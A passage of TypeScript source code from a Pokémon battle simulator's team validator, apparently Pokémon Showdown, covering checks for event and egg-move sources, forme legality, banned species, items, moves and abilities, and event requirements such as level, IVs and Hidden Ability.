			const splitSource = source.substr(source.charAt(2) === 'T' ? 3 : 2).split(' ');
			// Gen 1 events are looked up against Gen 2 data.
			const dex = (this.dex.gen === 1 ? this.dex.mod('gen2') : this.dex);
			eventSpecies = dex.getSpecies(splitSource[1]);
			const eventLsetData = this.dex.getLearnsetData(eventSpecies.id);
			eventData = eventLsetData.eventData?.[parseInt(splitSource[0])];
			if (!eventData) {
				throw new Error(`${eventSpecies.name} from ${species.name} doesn't have data for event ${source}`);
			}
		} else if (source === '7V') {
			// Gen 1-2 Virtual Console transfer: synthesize pseudo-event data
			// (Mew and Celebi get special level/IV/shiny treatment).
			const isMew = species.id === 'mew';
			const isCelebi = species.id === 'celebi';
			eventData = {
				generation: 2,
				level: isMew ? 5 : isCelebi ? 30 : undefined,
				perfectIVs: isMew || isCelebi ? 5 : 3,
				isHidden: !!this.dex.mod('gen7').getSpecies(species.id).abilities['H'],
				shiny: isMew ? undefined : 1,
				pokeball: 'pokeball',
				from: 'Gen 1-2 Virtual Console transfer',
			};
		} else if (source === '8V') {
			// Let's Go -> HOME transfer: synthesized pseudo-event data.
			const isMew = species.id === 'mew';
			eventData = {
				generation: 8,
				perfectIVs: isMew ? 3 : undefined,
				shiny: isMew ? undefined : 1,
				from: 'Gen 7 Let\'s Go! HOME transfer',
			};
		} else if (source.charAt(1) === 'D') {
			// Gen 5 Dream World: level 10 with the Hidden Ability.
			eventData = {
				generation: 5,
				level: 10,
				from: 'Gen 5 Dream World',
				isHidden: !!this.dex.mod('gen5').getSpecies(species.id).abilities['H'],
			};
		} else if (source.charAt(1) === 'E') {
			// Egg source: valid iff some father can pass down the egg moves.
			if (this.findEggMoveFathers(source, species, setSources)) {
				return undefined;
			}
			if (because) throw new Error(`Wrong place to get an egg incompatibility message`);
			return true;
		} else {
			throw new Error(`Unidentified source ${source} passed to validateSource`);
		}
		// complicated fancy return signature
		return this.validateEvent(set, eventData, eventSpecies, because as any) as any;
	}
	findEggMoveFathers(source: PokemonSource, species: Species, setSources: PokemonSources): boolean;
	findEggMoveFathers(source: PokemonSource, species: Species, setSources: PokemonSources, getAll: true): ID[] | null;
	/**
	 * Checks whether all of the limited egg moves in `setSources` can be
	 * inherited from a single father.
	 *
	 * Without `getAll`, returns a boolean. With `getAll`, returns the list
	 * of possible father IDs (`['*']` meaning "any father" when there are
	 * no limited egg moves), or `null` when no father exists before Gen 6.
	 */
	findEggMoveFathers(source: PokemonSource, species: Species, setSources: PokemonSources, getAll = false) {
		// tradebacks have an eggGen of 2 even though the source is 1ET
		const eggGen = Math.max(parseInt(source.charAt(0)), 2);
		const fathers: ID[] = [];
		// Gen 6+ don't have egg move incompatibilities
		// (except for certain cases with baby Pokemon not handled here)
		if (!getAll && eggGen >= 6) return true;
		const eggMoves = setSources.limitedEggMoves;
		// must have 2 or more egg moves to have egg move incompatibilities
		if (!eggMoves) {
			// happens often in gen 1-6 LC if your only egg moves are level-up moves,
			// which aren't limited and so aren't in `limitedEggMoves`
			return getAll ? ['*'] : true;
		}
		if (!getAll && eggMoves.length <= 1) return true;
		// gen 1 eggs come from gen 2 breeding
		const dex = this.dex.gen === 1 ? this.dex.mod('gen2') : this.dex;
		// In Gen 5 and earlier, egg moves can only be inherited from the father
		// we'll test each possible father separately
		let eggGroups = species.eggGroups;
		if (species.id === 'nidoqueen' || species.id === 'nidorina') {
			// The Nidorina/Nidoqueen line is validated via Nidoran-F's egg groups.
			eggGroups = dex.getSpecies('nidoranf').eggGroups;
		} else if (dex !== this.dex) {
			// Gen 1 tradeback; grab the egg groups from Gen 2
			eggGroups = dex.getSpecies(species.id).eggGroups;
		}
		// Undiscovered-group babies: use their evolution's egg groups instead.
		if (eggGroups[0] === 'Undiscovered') eggGroups = dex.getSpecies(species.evos[0]).eggGroups;
		if (eggGroups[0] === 'Undiscovered' || !eggGroups.length) {
			throw new Error(`${species.name} has no egg groups for source ${source}`);
		}
		// no chainbreeding necessary if the father can be Smeargle
		if (!getAll && eggGroups.includes('Field')) return true;
		// try to find a father to inherit the egg move combination from
		for (const fatherid in dex.data.Pokedex) {
			const father = dex.getSpecies(fatherid);
			const fatherLsetData = dex.getLearnsetData(fatherid as ID);
			// can't inherit from CAP pokemon
			if (father.isNonstandard) continue;
			// can't breed mons from future gens
			if (father.gen > eggGen) continue;
			// father must be male
			if (father.gender === 'N' || father.gender === 'F') continue;
			// can't inherit from dex entries with no learnsets
			if (!fatherLsetData.exists || !fatherLsetData.learnset) continue;
			// something is clearly wrong if its only possible father is itself
			// (exceptions: ExtremeSpeed Dragonite, Self-destruct Snorlax)
			if (species.id === fatherid && !['dragonite', 'snorlax'].includes(fatherid)) continue;
			// don't check NFE Pokémon - their evolutions will know all their moves and more
			// exception: Combee/Salandit, because their evos can't be fathers
			if (father.evos.length) {
				const evolvedFather = dex.getSpecies(father.evos[0]);
				if (evolvedFather.gen <= eggGen && evolvedFather.gender !== 'F') continue;
			}
			// must be able to breed with father
			if (!father.eggGroups.some(eggGroup => eggGroups.includes(eggGroup))) continue;
			// father must be able to learn the move
			if (!this.fatherCanLearn(father, eggMoves, eggGen)) continue;
			// father found!
			if (!getAll) return true;
			fathers.push(fatherid as ID);
		}
		if (!getAll) return false;
		// Pre-Gen 6, an empty father list means the combination is impossible.
		return (!fathers.length && eggGen < 6) ? null : fathers;
	}
	/**
	 * We could, if we wanted, do a complete move validation of the father's
	 * moveset to see if it's valid. This would recurse and be NP-Hard so
	 * instead we won't. We'll instead use a simplified algorithm: The father
	 * can learn the moveset if it has at most one egg/event move.
	 *
	 * `eggGen` should be 5 or earlier. Later gens should never call this
	 * function (the answer is always yes).
	 */
	fatherCanLearn(species: Species, moves: ID[], eggGen: number) {
		let lsetData = this.dex.getLearnsetData(species.id);
		if (!lsetData.learnset) return false;
		// Smeargle is always accepted as a father.
		if (species.id === 'smeargle') return true;
		const canBreedWithSmeargle = species.eggGroups.includes('Field');
		// Count of moves the father can only get via restricted (egg/event) sources.
		let eggMoveCount = 0;
		for (const move of moves) {
			let curSpecies: Species | null = species;
			/** 1 = can learn from egg, 2 = can learn unrestricted */
			let canLearn: 0 | 1 | 2 = 0;
			// Walk up the learnset chain until an unrestricted source is found.
			while (curSpecies) {
				lsetData = this.dex.getLearnsetData(curSpecies.id);
				if (lsetData.learnset && lsetData.learnset[move]) {
					for (const moveSource of lsetData.learnset[move]) {
						// Ignore sources from after the egg's generation.
						if (parseInt(moveSource.charAt(0)) > eggGen) continue;
						const canLearnFromSmeargle = moveSource.charAt(1) === 'E' && canBreedWithSmeargle;
						// E/S/D/V sources are restricted; anything else (or a
						// Smeargle-assisted egg move) is unrestricted.
						if (!'ESDV'.includes(moveSource.charAt(1)) || canLearnFromSmeargle) {
							canLearn = 2;
							break;
						} else {
							canLearn = 1;
						}
					}
				}
				if (canLearn === 2) break;
				curSpecies = this.learnsetParent(curSpecies);
			}
			if (!canLearn) return false;
			// At most one restricted move is allowed on the father (see above).
			if (canLearn === 1) {
				eggMoveCount++;
				if (eggMoveCount > 1) return false;
			}
		}
		return true;
	}
	/**
	 * Validates forme legality: battle-only formes, item/move/ability forme
	 * requirements, and signature-based forme selection.
	 *
	 * Mutates `set.species` in several cases (resolving Necrozma-Ultra,
	 * reverting battle-only formes, applying item-forced formes, cosplay
	 * Pikachu, Keldeo-Resolute) and may replace Iron Head with a crowned
	 * signature move. Returns an array of problem messages.
	 */
	validateForme(set: PokemonSet) {
		const dex = this.dex;
		const name = set.name || set.species;
		const problems = [];
		const item = dex.getItem(set.item);
		const species = dex.getSpecies(set.species);
		if (species.name === 'Necrozma-Ultra') {
			// 1 = knows Sunsteel Strike (Dusk-Mane), 2 = knows Moongeist Beam
			// (Dawn-Wings); 0 or 3 is ambiguous and rejected below.
			const whichMoves = (set.moves.includes('sunsteelstrike') ? 1 : 0) +
				(set.moves.includes('moongeistbeam') ? 2 : 0);
			if (item.name !== 'Ultranecrozium Z') {
				// Necrozma-Ultra transforms from one of two formes, and neither one is the base forme
				problems.push(`Necrozma-Ultra must start the battle holding Ultranecrozium Z.`);
			} else if (whichMoves === 1) {
				set.species = 'Necrozma-Dusk-Mane';
			} else if (whichMoves === 2) {
				set.species = 'Necrozma-Dawn-Wings';
			} else {
				problems.push(`Necrozma-Ultra must start the battle as Necrozma-Dusk-Mane or Necrozma-Dawn-Wings holding Ultranecrozium Z. Please specify which Necrozma it should start as.`);
			}
		} else if (species.name === 'Zygarde-Complete') {
			problems.push(`Zygarde-Complete must start the battle as Zygarde or Zygarde-10% with Power Construct. Please specify which Zygarde it should start as.`);
		} else if (species.battleOnly) {
			if (species.requiredAbility && set.ability !== species.requiredAbility) {
				// Darmanitan-Zen
				problems.push(`${species.name} transforms in-battle with ${species.requiredAbility}, please fix its ability.`);
			}
			if (species.requiredItems) {
				if (!species.requiredItems.includes(item.name)) {
					// Mega or Primal
					problems.push(`${species.name} transforms in-battle with ${species.requiredItem}, please fix its item.`);
				}
			}
			if (species.requiredMove && !set.moves.includes(toID(species.requiredMove))) {
				// Meloetta-Pirouette, Rayquaza-Mega
				problems.push(`${species.name} transforms in-battle with ${species.requiredMove}, please fix its moves.`);
			}
			if (typeof species.battleOnly !== 'string') {
				// Ultra Necrozma and Complete Zygarde are already checked above
				throw new Error(`${species.name} should have a string battleOnly`);
			}
			// Set to out-of-battle forme
			set.species = species.battleOnly;
		} else {
			if (species.requiredAbility) {
				// Impossible!
				throw new Error(`Species ${species.name} has a required ability despite not being a battle-only forme; it should just be in its abilities table.`);
			}
			if (species.requiredItems && !species.requiredItems.includes(item.name)) {
				if (dex.gen >= 8 && (species.baseSpecies === 'Arceus' || species.baseSpecies === 'Silvally')) {
					// Arceus/Silvally formes in gen 8 only require the item with Multitype/RKS System
					if (set.ability === species.abilities[0]) {
						problems.push(
							`${name} needs to hold ${species.requiredItems.join(' or ')}.`,
							`(It will revert to its Normal forme if you remove the item or give it a different item.)`
						);
					}
				} else {
					// Memory/Drive/Griseous Orb/Plate/Z-Crystal - Forme mismatch
					const baseSpecies = this.dex.getSpecies(species.changesFrom);
					problems.push(
						`${name} needs to hold ${species.requiredItems.join(' or ')} to be in its ${species.forme} forme.`,
						`(It will revert to its ${baseSpecies.baseForme || 'base'} forme if you remove the item or give it a different item.)`
					);
				}
			}
			if (species.requiredMove && !set.moves.includes(toID(species.requiredMove))) {
				const baseSpecies = this.dex.getSpecies(species.changesFrom);
				problems.push(
					`${name} needs to know the move ${species.requiredMove} to be in its ${species.forme} forme.`,
					`(It will revert to its ${baseSpecies.baseForme} forme if it forgets the move.)`
				);
			}
			// Mismatches between the set forme (if not base) and the item signature forme will have been rejected already.
			// It only remains to assign the right forme to a set with the base species (Arceus/Genesect/Giratina/Silvally).
			if (item.forcedForme && species.name === dex.getSpecies(item.forcedForme).baseSpecies) {
				set.species = item.forcedForme;
			}
		}
		// Cosplay Pikachu formes are identified by their signature move.
		if (species.name === 'Pikachu-Cosplay') {
			const cosplay: {[k: string]: string} = {
				meteormash: 'Pikachu-Rock-Star', iciclecrash: 'Pikachu-Belle', drainingkiss: 'Pikachu-Pop-Star',
				electricterrain: 'Pikachu-PhD', flyingpress: 'Pikachu-Libre',
			};
			for (const moveid of set.moves) {
				if (moveid in cosplay) {
					set.species = cosplay[moveid];
					break;
				}
			}
		}
		// Gen 8: a Keldeo knowing Secret Sword is treated as Keldeo-Resolute.
		if (species.name === 'Keldeo' && set.moves.includes('secretsword') && dex.gen >= 8) {
			set.species = 'Keldeo-Resolute';
		}
		// Crowned formes replace Iron Head with their signature move.
		const crowned: {[k: string]: string} = {
			'Zacian-Crowned': 'behemothblade', 'Zamazenta-Crowned': 'behemothbash',
		};
		if (set.species in crowned) {
			const ironHead = set.moves.indexOf('ironhead');
			if (ironHead >= 0) {
				set.moves[ironHead] = crowned[set.species];
			}
		}
		return problems;
	}
	/**
	 * Validates the species against the rule table, registering the relevant
	 * `setHas` tags (species, base species, tier, doubles tier, mega) along
	 * the way.
	 *
	 * `tierSpecies` may differ from `species` (e.g. the forme used for
	 * tiering); both are checked. Returns a problem message string, or null
	 * if the species is allowed. Throughout, a `ruleTable.check` result of
	 * `''` means "explicitly allowed" and short-circuits to null.
	 */
	checkSpecies(set: PokemonSet, species: Species, tierSpecies: Species, setHas: {[k: string]: true}) {
		const dex = this.dex;
		const ruleTable = this.ruleTable;
		setHas['pokemon:' + species.id] = true;
		setHas['basepokemon:' + toID(species.baseSpecies)] = true;
		let isMega = false;
		if (tierSpecies !== species) {
			setHas['pokemon:' + tierSpecies.id] = true;
			if (tierSpecies.isMega || tierSpecies.isPrimal) {
				setHas['pokemontag:mega'] = true;
				isMega = true;
			}
		}
		// Parenthesized tiers alias to the tier used for banlist purposes.
		const tier = tierSpecies.tier === '(PU)' ? 'ZU' : tierSpecies.tier === '(NU)' ? 'PU' : tierSpecies.tier;
		const tierTag = 'pokemontag:' + toID(tier);
		setHas[tierTag] = true;
		const doublesTier = tierSpecies.doublesTier === '(DUU)' ? 'DNU' : tierSpecies.doublesTier;
		const doublesTierTag = 'pokemontag:' + toID(doublesTier);
		setHas[doublesTierTag] = true;
		// Only pokemon that can gigantamax should have the Gmax flag
		if (!tierSpecies.canGigantamax && set.gigantamax) {
			return `${tierSpecies.name} cannot Gigantamax but is flagged as being able to.`;
		}
		let banReason = ruleTable.check('pokemon:' + species.id);
		if (banReason) {
			return `${species.name} is ${banReason}.`;
		}
		if (banReason === '') return null;
		if (tierSpecies !== species) {
			banReason = ruleTable.check('pokemon:' + tierSpecies.id);
			if (banReason) {
				return `${tierSpecies.name} is ${banReason}.`;
			}
			if (banReason === '') return null;
		}
		if (isMega) {
			banReason = ruleTable.check('pokemontag:mega', setHas);
			if (banReason) {
				return `Mega evolutions are ${banReason}.`;
			}
		}
		banReason = ruleTable.check('basepokemon:' + toID(species.baseSpecies));
		if (banReason) {
			return `${species.name} is ${banReason}.`;
		}
		if (banReason === '') {
			// don't allow nonstandard speciess when whitelisting standard base species
			// i.e. unbanning Pichu doesn't mean allowing Pichu-Spiky-Eared outside of Gen 4
			const baseSpecies = dex.getSpecies(species.baseSpecies);
			if (baseSpecies.isNonstandard === species.isNonstandard) {
				return null;
			}
		}
		// AG pokemon also fall under an Uber tier ban.
		banReason = ruleTable.check(tierTag) || (tier === 'AG' ? ruleTable.check('pokemontag:uber') : null);
		if (banReason) {
			return `${tierSpecies.name} is in ${tier}, which is ${banReason}.`;
		}
		if (banReason === '') return null;
		banReason = ruleTable.check(doublesTierTag);
		if (banReason) {
			return `${tierSpecies.name} is in ${doublesTier}, which is ${banReason}.`;
		}
		if (banReason === '') return null;
		// Whitelist-style formats ban everything not explicitly allowed.
		banReason = ruleTable.check('pokemontag:allpokemon');
		if (banReason) {
			return `${species.name} is not in the list of allowed pokemon.`;
		}
		// obtainability
		if (tierSpecies.isNonstandard) {
			banReason = ruleTable.check('pokemontag:' + toID(tierSpecies.isNonstandard));
			if (banReason) {
				if (tierSpecies.isNonstandard === 'Unobtainable') {
					return `${tierSpecies.name} is not obtainable without hacking or glitches.`;
				}
				if (tierSpecies.isNonstandard === 'Gigantamax') {
					return `${tierSpecies.name} is not obtainable without Gigantamaxing, even through hacking.`;
				}
				return `${tierSpecies.name} is tagged ${tierSpecies.isNonstandard}, which is ${banReason}.`;
			}
			if (banReason === '') return null;
		}
		// Special casing for Pokemon that can Gmax, but their Gmax factor cannot be legally obtained
		if (tierSpecies.gmaxUnreleased && set.gigantamax) {
			banReason = ruleTable.check('pokemontag:unobtainable');
			if (banReason) {
				return `${tierSpecies.name} is flagged as gigantamax, but it cannot gigantamax without hacking or glitches.`;
			}
			if (banReason === '') return null;
		}
		if (tierSpecies.isNonstandard && tierSpecies.isNonstandard !== 'Unobtainable') {
			banReason = ruleTable.check('nonexistent', setHas);
			if (banReason) {
				if (['Past', 'Future'].includes(tierSpecies.isNonstandard)) {
					return `${tierSpecies.name} does not exist in Gen ${dex.gen}.`;
				}
				return `${tierSpecies.name} does not exist in this game.`;
			}
			if (banReason === '') return null;
		}
		return null;
	}
checkItem(set: PokemonSet, item: Item, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['item:' + item.id] = true;
let banReason = ruleTable.check('item:' + item.id);
if (banReason) {
return `${set.name}'s item ${item.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allitems');
if (banReason) {
return `${set.name}'s item ${item.name} is not in the list of allowed items.`;
}
// obtainability
if (item.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(item.isNonstandard));
if (banReason) {
if (item.isNonstandard === 'Unobtainable') {
return `${item.name} is not obtainable without hacking or glitches.`;
}
return `${set.name}'s item ${item.name} is tagged ${item.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
}
if (item.isNonstandard && item.isNonstandard !== 'Unobtainable') {
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(item.isNonstandard)) {
return `${set.name}'s item ${item.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s item ${item.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkMove(set: PokemonSet, move: Move, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['move:' + move.id] = true;
let banReason = ruleTable.check('move:' + move.id);
if (banReason) {
return `${set.name}'s move ${move.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allmoves');
if (banReason) {
return `${set.name}'s move ${move.name} is not in the list of allowed moves.`;
}
// obtainability
if (move.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(move.isNonstandard));
if (banReason) {
if (move.isNonstandard === 'Unobtainable') {
return `${move.name} is not obtainable without hacking or glitches.`;
}
if (move.isNonstandard === 'Gigantamax') {
return `${move.name} is not usable without Gigantamaxing its user, ${move.isMax}.`;
}
return `${set.name}'s move ${move.name} is tagged ${move.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
}
if (move.isNonstandard && move.isNonstandard !== 'Unobtainable') {
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(move.isNonstandard)) {
return `${set.name}'s move ${move.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s move ${move.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkAbility(set: PokemonSet, ability: Ability, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['ability:' + ability.id] = true;
let banReason = ruleTable.check('ability:' + ability.id);
if (banReason) {
return `${set.name}'s ability ${ability.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('pokemontag:allabilities');
if (banReason) {
return `${set.name}'s ability ${ability.name} is not in the list of allowed abilities.`;
}
// obtainability
if (ability.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(ability.isNonstandard));
if (banReason) {
return `${set.name}'s ability ${ability.name} is tagged ${ability.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(ability.isNonstandard)) {
return `${set.name}'s ability ${ability.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s ability ${ability.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
checkNature(set: PokemonSet, nature: Nature, setHas: {[k: string]: true}) {
const dex = this.dex;
const ruleTable = this.ruleTable;
setHas['nature:' + nature.id] = true;
let banReason = ruleTable.check('nature:' + nature.id);
if (banReason) {
return `${set.name}'s nature ${nature.name} is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('allnatures');
if (banReason) {
return `${set.name}'s nature ${nature.name} is not in the list of allowed natures.`;
}
// obtainability
if (nature.isNonstandard) {
banReason = ruleTable.check('pokemontag:' + toID(nature.isNonstandard));
if (banReason) {
return `${set.name}'s nature ${nature.name} is tagged ${nature.isNonstandard}, which is ${banReason}.`;
}
if (banReason === '') return null;
banReason = ruleTable.check('nonexistent', setHas);
if (banReason) {
if (['Past', 'Future'].includes(nature.isNonstandard)) {
return `${set.name}'s nature ${nature.name} does not exist in Gen ${dex.gen}.`;
}
return `${set.name}'s nature ${nature.name} does not exist in this game.`;
}
if (banReason === '') return null;
}
return null;
}
	validateEvent(set: PokemonSet, eventData: EventInfo, eventSpecies: Species): true | undefined;
	validateEvent(
		set: PokemonSet, eventData: EventInfo, eventSpecies: Species, because: string, from?: string
	): string[] | undefined;
	/**
	 * Returns array of error messages if invalid, undefined if valid
	 *
	 * If `because` is not passed, instead returns true if invalid.
	 *
	 * Checks the set against a single event's requirements: generation,
	 * level, shininess, gender, nature (pre-Mints), IVs / guaranteed perfect
	 * IVs (and their Hidden Power implications), and ability restrictions.
	 * When valid, may mutate `set.hpType` and `set.gender` to match the
	 * event.
	 */
	validateEvent(set: PokemonSet, eventData: EventInfo, eventSpecies: Species, because = ``, from = `from an event`) {
		const dex = this.dex;
		let name = set.species;
		const species = dex.getSpecies(set.species);
		// Tradeback formats accept events from one generation later.
		const maxSourceGen = this.ruleTable.has('allowtradeback') ? Utils.clampIntRange(dex.gen + 1, 1, 8) : dex.gen;
		if (!eventSpecies) eventSpecies = species;
		if (set.name && set.species !== set.name && species.baseSpecies !== set.name) name = `${set.name} (${set.species})`;
		// Without `because` the caller only wants a boolean; bail at the first problem.
		const fastReturn = !because;
		if (eventData.from) from = `from ${eventData.from}`;
		const etc = `${because} ${from}`;
		const problems = [];
		if (dex.gen < 8 && this.minSourceGen > eventData.generation) {
			if (fastReturn) return true;
			problems.push(`This format requires Pokemon from gen ${this.minSourceGen} or later and ${name} is from gen ${eventData.generation}${etc}.`);
		}
		if (maxSourceGen < eventData.generation) {
			if (fastReturn) return true;
			problems.push(`This format is in gen ${dex.gen} and ${name} is from gen ${eventData.generation}${etc}.`);
		}
		if (eventData.japan) {
			if (fastReturn) return true;
			problems.push(`${name} has moves from Japan-only events, but this format simulates International Yellow/Crystal which can't trade with Japanese games.`);
		}
		if (eventData.level && (set.level || 0) < eventData.level) {
			if (fastReturn) return true;
			problems.push(`${name} must be at least level ${eventData.level}${etc}.`);
		}
		// `shiny` values: true = must be shiny, falsy = must not be shiny,
		// 1 = either is acceptable (neither clause below matches).
		if ((eventData.shiny === true && !set.shiny) || (!eventData.shiny && set.shiny)) {
			if (fastReturn) return true;
			const shinyReq = eventData.shiny ? ` be shiny` : ` not be shiny`;
			problems.push(`${name} must${shinyReq}${etc}.`);
		}
		if (eventData.gender) {
			if (set.gender && eventData.gender !== set.gender) {
				if (fastReturn) return true;
				problems.push(`${name}'s gender must be ${eventData.gender}${etc}.`);
			}
		}
		// From Gen 8, Mints can override an event nature.
		const canMint = dex.gen > 7;
		if (eventData.nature && eventData.nature !== set.nature && !canMint) {
			if (fastReturn) return true;
			problems.push(`${name} must have a ${eventData.nature} nature${etc} - Mints are only available starting gen 8.`);
		}
		let requiredIVs = 0;
		if (eventData.ivs) {
			/** In Gen 7, IVs can be changed to 31 */
			const canBottleCap = (dex.gen >= 7 && set.level === 100);
			if (!set.ivs) set.ivs = {hp: 31, atk: 31, def: 31, spa: 31, spd: 31, spe: 31};
			const statTable = {
				hp: 'HP', atk: 'Attack', def: 'Defense', spa: 'Special Attack', spd: 'Special Defense', spe: 'Speed',
			};
			let statName: StatName;
			for (statName in eventData.ivs) {
				// A 31 IV may have been hyper trained up, so it can't be rejected.
				if (canBottleCap && set.ivs[statName] === 31) continue;
				if (set.ivs[statName] !== eventData.ivs[statName]) {
					if (fastReturn) return true;
					problems.push(`${name} must have ${eventData.ivs[statName]} ${statTable[statName]} IVs${etc}.`);
				}
			}
			if (canBottleCap) {
				// IVs can be overridden but Hidden Power type can't
				if (Object.keys(eventData.ivs).length >= 6) {
					const requiredHpType = dex.getHiddenPower(eventData.ivs).type;
					if (set.hpType && set.hpType !== requiredHpType) {
						if (fastReturn) return true;
						problems.push(`${name} can only have Hidden Power ${requiredHpType}${etc}.`);
					}
					set.hpType = requiredHpType;
				}
			}
		} else {
			requiredIVs = eventData.perfectIVs || 0;
		}
		if (requiredIVs && set.ivs) {
			// Legendary Pokemon must have at least 3 perfect IVs in gen 6
			// Events can also have a certain amount of guaranteed perfect IVs
			let perfectIVs = 0;
			let statName: StatName;
			for (statName in set.ivs) {
				if (set.ivs[statName] >= 31) perfectIVs++;
			}
			if (perfectIVs < requiredIVs) {
				if (fastReturn) return true;
				if (eventData.perfectIVs) {
					problems.push(`${name} must have at least ${requiredIVs} perfect IVs${etc}.`);
				}
			}
			// The perfect IV count affects Hidden Power availability
			if (dex.gen >= 3 && requiredIVs >= 3 && set.hpType === 'Fighting') {
				if (fastReturn) return true;
				problems.push(`${name} can't use Hidden Power Fighting because it must have at least three perfect IVs${etc}.`);
			} else if (dex.gen >= 3 && requiredIVs >= 5 && set.hpType &&
				!['Dark', 'Dragon', 'Electric', 'Steel', 'Ice'].includes(set.hpType)) {
				if (fastReturn) return true;
				problems.push(`${name} can only use Hidden Power Dark/Dragon/Electric/Steel/Ice because it must have at least 5 perfect IVs${etc}.`);
			}
		}
		// Event-related ability restrictions only matter if we care about illegal abilities
		const ruleTable = this.ruleTable;
		if (ruleTable.has('obtainableabilities')) {
			if (dex.gen <= 5 && eventData.abilities && eventData.abilities.length === 1 && !eventData.isHidden) {
				if (species.name === eventSpecies.name) {
					// has not evolved, abilities must match
					const requiredAbility = dex.getAbility(eventData.abilities[0]).name;
					if (set.ability !== requiredAbility) {
						if (fastReturn) return true;
						problems.push(`${name} must have ${requiredAbility}${etc}.`);
					}
				} else {
					// has evolved
					const ability1 = dex.getAbility(eventSpecies.abilities['1']);
					if (ability1.gen && eventData.generation >= ability1.gen) {
						// pokemon had 2 available abilities in the gen the event happened
						// ability is restricted to a single ability slot
						const requiredAbilitySlot = (toID(eventData.abilities[0]) === ability1.id ? 1 : 0);
						const requiredAbility = dex.getAbility(species.abilities[requiredAbilitySlot] || species.abilities['0']).name;
						if (set.ability !== requiredAbility) {
							const originalAbility = dex.getAbility(eventData.abilities[0]).name;
							if (fastReturn) return true;
							problems.push(`${name} must have ${requiredAbility}${because} from a ${originalAbility} ${eventSpecies.name} event.`);
						}
					}
				}
			}
			if (species.abilities['H']) {
				const isHidden = (set.ability === species.abilities['H']);
				if (!isHidden && eventData.isHidden) {
					if (fastReturn) return true;
					problems.push(`${name} must have its Hidden Ability${etc}.`);
				}
				// Ability Patch (Gen 8, outside the gen8dlc1 mod) legalizes a
				// Hidden Ability on a non-Hidden-Ability event.
				const canUseAbilityPatch = dex.gen >= 8 && this.format.mod !== 'gen8dlc1';
				if (isHidden && !eventData.isHidden && !canUseAbilityPatch) {
					if (fastReturn) return true;
					problems.push(`${name} must not have its Hidden Ability${etc}.`);
				}
			}
		}
		if (problems.length) return problems;
		// Valid: sync the set's gender with the event's (implicit undefined return).
		if (eventData.gender) set.gender = eventData.gender;
	}
/**
 * Builds a fresh PokemonSources covering every generation this set could
 * legally originate from, given the format's rules.
 */
allSources(species?: Species) {
	const gen = this.dex.gen;
	// Gen 3+ games cannot obtain Pokemon from gens 1-2, so raise the floor.
	let minSourceGen = this.minSourceGen;
	if (gen >= 3 && minSourceGen < 3) minSourceGen = 3;
	if (species) minSourceGen = Math.max(minSourceGen, species.gen);
	// Tradeback formats may draw on one generation ahead (capped at gen 8).
	const maxSourceGen = this.ruleTable.has('allowtradeback') ?
		Utils.clampIntRange(gen + 1, 1, 8) :
		gen;
	return new PokemonSources(maxSourceGen, minSourceGen);
}
/**
 * Validates that every move in `moves` is legally learnable by `species`,
 * progressively narrowing `setSources` to the obtainment ways compatible
 * with the whole moveset. Returns an array of problem strings (empty when
 * the moveset is legal).
 */
validateMoves(
	species: Species, moves: string[], setSources: PokemonSources, set?: Partial<PokemonSet>,
	name: string = species.name
) {
	const dex = this.dex;
	const ruleTable = this.ruleTable;
	const problems = [];
	// A format's rule table may override the default move-legality checker.
	const checkCanLearn = (ruleTable.checkCanLearn && ruleTable.checkCanLearn[0] || this.checkCanLearn);
	for (const moveName of moves) {
		const move = dex.getMove(moveName);
		const problem = checkCanLearn.call(this, move, species, setSources, set);
		if (problem) {
			problems.push(`${name}${problem}`);
			// One illegal move is enough to fail the set; skip the rest.
			break;
		}
	}
	if (setSources.size() && setSources.moveEvoCarryCount > 3) {
		// A Pokemon that evolves by knowing a specific move must reserve a
		// slot for it, so at most 3 other moves can be carried over.
		if (setSources.sourcesBefore < 6) setSources.sourcesBefore = 0;
		setSources.sources = setSources.sources.filter(
			source => source.charAt(1) === 'E' && parseInt(source.charAt(0)) >= 6
		);
		if (!setSources.size()) {
			problems.push(`${name} needs to know ${species.evoMove || 'a Fairy-type move'} to evolve, so it can only know 3 other moves from ${species.prevo}.`);
		}
	}
	if (problems.length) return problems;
	if (setSources.isHidden) {
		// Hidden Abilities only exist from gen 5 on: drop earlier sources.
		setSources.sources = setSources.sources.filter(
			source => parseInt(source.charAt(0)) >= 5
		);
		if (setSources.sourcesBefore < 5) setSources.sourcesBefore = 0;
		const canUseAbilityPatch = dex.gen >= 8 && this.format.mod !== 'gen8dlc1';
		if (!setSources.size() && !canUseAbilityPatch) {
			problems.push(`${name} has a hidden ability - it can't have moves only learned before gen 5.`);
			return problems;
		}
	}
	if (setSources.babyOnly && setSources.sources.length) {
		// Moves only available on the unevolved (baby) form are incompatible
		// with event ('S'), egg ('E'), and DW ('D') sources tied to an evolution.
		const baby = dex.getSpecies(setSources.babyOnly);
		const babyEvo = toID(baby.evos[0]);
		setSources.sources = setSources.sources.filter(source => {
			if (source.charAt(1) === 'S') {
				const sourceId = source.split(' ')[1];
				if (sourceId !== baby.id) return false;
			}
